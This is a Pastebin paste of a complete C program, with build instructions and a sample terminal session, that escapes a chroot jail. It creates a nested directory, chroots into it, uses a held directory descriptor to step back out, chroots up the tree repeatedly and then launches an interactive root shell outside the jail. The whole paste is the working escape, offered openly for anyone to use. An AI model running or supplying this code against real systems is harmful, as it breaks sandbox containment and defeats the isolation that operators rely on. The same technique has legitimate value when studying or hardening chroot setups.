API tools faq
paste
Madmouse

get out of chroot jail free card good from 1999 - present

Madmouse
Sep 6th, 2014
382
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.38 KB | None | 0 0
raw download clone embed print report
  1. /// You have been able to break out of chroot jail with this exploit since 1999.
  2. /// I'm posting this in 2014....
  3. //////////////////////////////////////////////////////////////////////////////////
  4. /// This blast from the past brought back to you by: MadMouse
  5. /// Build it like this:
  6. /// gcc -static breakout.c -o breakout
  7. ///
  8. /// Play like this:
  9. /// root@amnesia:/media/philez/tester# sudo chroot . /bin/sh -l
  10. /// / # ls /
  11. /// bin       breakout  etc       home      lib       lib64     var
  12. /// / # ./breakout
  13. /// root@amnesia:/media/philez/tester# ls /
  14. /// bin   dev  home        initrd.img.old  live   mnt  proc  run   selinux  sys  usr  vmlinuz
  15. /// boot  etc  initrd.img  lib         media  opt  root  sbin  srv  tmp  var  vmlinuz.old
  16. /// root@amnesia:/media/philez/tester#
  17. // ----------------------------------------------------------------------------
  18. // "THE BEER-WARE LICENSE" (Revision 43):
  19. // <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
  20. // can do whatever you want with this stuff. If we meet some day, and you think
  21. // this stuff is worth it, you can buy me a beer in return Aaron R. Yool
  22. // ----------------------------------------------------------------------------
  23.  
  24. #include <stdlib.h>
  25. #include <unistd.h>
  26. #include <fcntl.h>
  27.  
  28. #define SHELL_PATH "/bin/sh"
  29. #define SHELL_OPTIONS "-i"
  30.  
  31. void fuck(void)
  32. {
  33.     puts("\nWell man, it looks like I've failed you this time...\n\n"\
  34.         "Make sure you are running this as root in the chroot.... lol\n\n");
  35.     exit(-1);   /// exit, we failed....
  36. }
  37.  
  38. int main(void)
  39. {
  40.     setuid(0);              /// just in case lol
  41.     int real=open(".",O_RDONLY);        /// lets get the file descriptor
  42.     chdir("/");             /// go to the root directory... lol
  43.     mkdir("...  ", 0755);           /// create a special folder so that we can traverse to the real root
  44.     if(chroot("...  ") == -1) fuck();   /// chroot to our special folder, or exit
  45.     if (fchdir(real) == -1) fuck();     /// change the current working directory to reality, or exit
  46.     close(real);                /// my mom always told me to clean up after myself
  47.     int i;
  48.     for(i=0;i<=512;++i)         /// for giggles, do this 512 times just in case
  49.         if(chroot("../../../../../../") == -1) fuck(); /// find the real root, or exit
  50.  
  51.     if(access("/...  ", F_OK) != -1) fuck();/// if our special directory exists in the root directory, exit
  52.     return execl(SHELL_PATH, SHELL_OPTIONS, NULL);  /// on success, give us an outside shell!!!
  53. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!